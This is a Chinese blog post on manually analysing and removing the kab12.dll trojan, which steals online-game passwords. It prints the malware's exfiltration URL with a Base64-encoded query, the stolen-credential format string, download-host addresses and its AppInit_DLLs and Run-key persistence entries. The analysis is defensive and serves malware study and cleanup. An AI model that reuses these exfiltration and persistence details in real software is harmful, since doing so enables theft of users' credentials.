kab12.dll 病毒的分析
前几天电脑中了一个病毒。开始系统还没有什么反应。直到卡巴发出病毒警告,说是在http://61.164.118.208这个地址存在病毒,我也没有注意,点了清除。结果卡巴无声关闭。然后用icesword一看,存在一大堆不明进程,进程名字由数字与字母组成。
怎么做?开始是我是把进程一个个给结束掉。然后找到病毒对应的文件,并删除之。恩,感觉好了。可过了一会,系统又出现了不明的进程,而且用icesword查看进程模块,发现几乎每个进程中都加载了一个叫HBSOUL.dll的模块。模块大小为24576bytes,于是用od打开,一番分析之后,发现这个模块有一个函数连接到地址http://8888123456.com/www/。并向post.asp传递消息,消息包括在URL中并使用Base64编码。在我的机器上最终的URL是:
http://8888123456.com/www/post.asp?s=c2VydmVyPSZhY2NvdW50PSZwYXNzd29yZDE9JnBhc3N3b3JkMj0mbGV2ZWxzPSZjYXNoPSZjYXNoMj0mbmFtZT0mc3BlY2lhbFNpZ249TVk5LTE0JlByb3RQYXNzPSZWZXJpZnk9MEQ5NzkwJmFyZWE9Jm90aGVyPSZpbnB1dHNvdXJjZT1LTw==
大家可以用记事本打开HBSOUL.dll,应该能够发现类似于:
server=%s&account=%s&password1=%s&password2=%s&levels=%s&cash=%s&cash2=%s&name=%s&specialSign=%s&ProtPass=%s&Verify=%s&area=%s&other=%s&inputsource=%s
的字符串。这就是这个模块搜索到的信息。
那么是谁加载的这个模块呢,我又分析了一个叫System.exe(注意,这也是一个系统进程的名字,不过系统进程System.exe的PID为4,病毒的PID比较大且不确定)。发现它在注册表键:
Software/Microsoft/Windows NT/CurrentVersion/Windows AppInit_DLLs
写下了如下的值:HBmhly.dll HB1000Y.dll HBWOOOL.dll HBXY2.dll HBJXSJ.dll HBSO2.dll HBFS2.dll HBXY3.dll HBSHQ.dll HBFY.dll HBWULIN2.dll HBW2I.dll HBKDXY.dll HBWORLD2.dll HBASKTAO.dll HBZHUXIAN.dll HBWOW.dll HBZERO.dll HBBO.dll HBCONQUER.dll HBSOUL.dll HBCHIBI.dll HBDNF.dll HBWARLORDS.dll HBTL.dll HBPICKCHINA.dll HBCT.dll HBGC.dll HBHM.dll HBHX2.dll HBQQHX.dll HBTW2.dll HBQQSG.dll HBQQFFO.dll HBZT.dll HBMIR2.dll HBRXJH.dll HBYY.dll HBMXD.dll HBSQ.dll HBTJ.dll HBFHZL.dll HBWLQX.dll HBLYFX.dll HBR2.dll HBCHD.dll HBTZ.dll HBQQXX.dll HBWD.dll HBZG.dll HBPPBL.dll HBXMJ.dll HBJTLQ.dll HBQJSJ.dll
这个键是系统在加载uer32.dll时也一并加载的模块。从中可以看到有我们的HBSOUL.dll。好家伙,这么多的东西。先用icesword把System.exe干掉(注意不要动与之同名的系统进程)。正准备把注册表对应的键值删除,可没想到删不了。难道装了驱动?我右击“我的电脑”图标,选中“设备”,在“查看”菜单中选“显示隐藏的设备”,在“非即插即用驱动程序”中发现了一个不明驱动“HBkernel32”,卸载之。删除余下的病毒,重启电脑。以为这次可以万事大吉。没有想到还是不行。
看来还是没有找到源头,在注册表中查找所有可能自启动的地方,终于在下面的键中发现有异:
software/microsoft/windows/currentversion/policies/explorer/run
有一个kab12.exe项,找到了,用icesword删除之,并把:
software/microsoft/windows/currentversion/shellserviceobjectdelayload
下的.dll项删除,说明一下这个键其实作用和同一级下的Run键是一样的,只是前者指向的是CLSID,后者指向文件。
kab12.exe的一个作用是加载kab12.dll到explorer.exe,然后由kab12.dll执行下载病毒文件的功能(我是怎么知道的?用记事本打开kab12.dll,有一个字符串“URLDownloadToFileA”)具体是连哪我没有分析了,估计是61.164.118.208。妈的,敢阴我?看老子怎么收拾它!
不知道它是怎么把卡巴给干掉的。
恩,有事可以联系我:gongyiling3468@163.com,这个应该是个新品种。
kab12.dll 病毒的分析相关推荐
- lpk.dll病毒的现象和手工处理
lpk.dll病毒相信大家并不陌生,此类病毒已经流行有一段时间了,对应的专杀工具也可以从网上搜索下载到,这足以表明该病毒的广泛性及危险性.本文对该病毒进行了行为分析,并向您呈现了手动处理的全部过程. ...
- 一个DDOS病毒的分析(一)
一.基本信息 样本名称:Rub.EXE 样本大小:21504 字节 病毒名称:Trojan.Win32.Rootkit.hv 加壳情况:UPX(3.07) 样本MD5:035C1ADA4BACE78D ...
- 瑞星专家:lpk.dll病毒的现象和手工处理
http://www.sina.com.cn 2011年10月22日 14:15 中国经济网 lpk.dll病毒相信大家并不陌生,此类病毒已经流行有一段时间了,对应的专杀工具也可以从网上搜索下载到 ...
- 利用NTLDR进入RING0的方法及MGF病毒技术分析
利用NTLDR进入RING0的方法及MGF病毒技术分析 2010年08月02日 [b]以前看了莫国防病毒的源代码.摸到了一个进入RING0的方法.今天又在EST论坛看到了代码,随手写一个笔记吧.其实w ...
- 了解lpk.dll是什么病毒以及lpk.dll病毒专杀方法
pk.dll病毒是当下比较流行的一类病毒,而正常系统本身也会存在lpk.dll文件,这足以说明这类病毒的危险性.系统本身的lpk.dll文件位于C:WINDOWSsystem32和C:WINDOWSs ...
- Nimda.A病毒技术分析笔记
Nimda.A病毒技术分析笔记 BY Delphiscn(cnBlaster#sohu.com)http://blog.csdn.net/delphiscn 病毒类型:蠕虫病毒 文件大小:57344字 ...
- [转] 一个U盘病毒简单分析
(转自:一个U盘病毒简单分析 - 瑞星网 原文日期:2014.03.25) U盘这个移动存储设备由于体积小.容量大.便于携带等优点,给人们的存储数据带来了很大的便利.但正是由于这种便利,也给病毒有 ...
- Android版本的Wannacry文件加密病毒样本分析(附带锁机)
一.前言 之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...
- 病毒行为分析初探(三)
病毒行为分析初探(三) 双击"病毒样本",运行病毒,看看文件和注册表的变化 文件:增加了不少文件呀(上图绿色所标,均是病毒运行生成的) 注册表:增加了不少注册表项,还改了两个键值. ...
最新文章
- 接收服务器显示帧控制错误,Websocket连接关闭,出现错误“接收到意外的继续帧”...
- java中哈夫曼编码所用的函数_数据结构(java语言描述)哈夫曼编码
- 图解MySQL数据库的安排和把持-1
- 亮剑.NET. 图解C#开发实战 在线阅读
- SQL语句添加删除修改字段
- Okhttp3中设置超时的方法
- 关于WebView加载URL时显示一片空白的问题
- 04.full_text match查询
- 美丽的数学家:如果您讨厌数学,这些其实都是人生故事
- 第10 章继承映射(InheritanceMappings)
- 诺基亚宣布与博通合作开发5G芯片 包括定制处理器
- CXF 生成Web Service Client(将WSDl 转化成 Java代码)
- 【QT】QT从零入门教程(六):QDockWidget停靠窗口
- RUP软件开发生命周期
- HDU 2202 POJ 2079 求平面最大三角形 【旋转卡壳】
- 国外最流行的Bootstrap后台管理模板
- 农夫山泉2面面试经历
- 跨域问题的解决-gateway跨域接解决方案,使用CorsWebFilter
- win32 24内存管理和文件操作
- 少年之文明与国之文明——---从奥运会看国人素质之飞跃